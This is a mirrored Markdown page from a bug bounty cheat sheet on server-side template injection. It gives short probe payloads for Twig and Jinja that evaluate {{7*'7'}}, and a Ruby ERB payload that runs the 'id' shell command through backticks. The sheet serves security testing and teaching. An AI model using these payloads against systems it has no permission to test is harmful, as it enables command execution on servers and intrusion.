mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-28 22:10:20 +00:00
23 lines
196 B
Markdown
23 lines
196 B
Markdown
## Template Injection
|
|
|
|
**Ruby**
|
|
|
|
```ruby
|
|
<%=`id`%>
|
|
```
|
|
|
|
**Twig**
|
|
|
|
The following payload should output `49`.
|
|
|
|
```
|
|
{{7*'7'}}
|
|
```
|
|
|
|
**Jinja**
|
|
|
|
This payload should output `7777777`.
|
|
|
|
```
|
|
{{7*'7'}}
|
|
```
|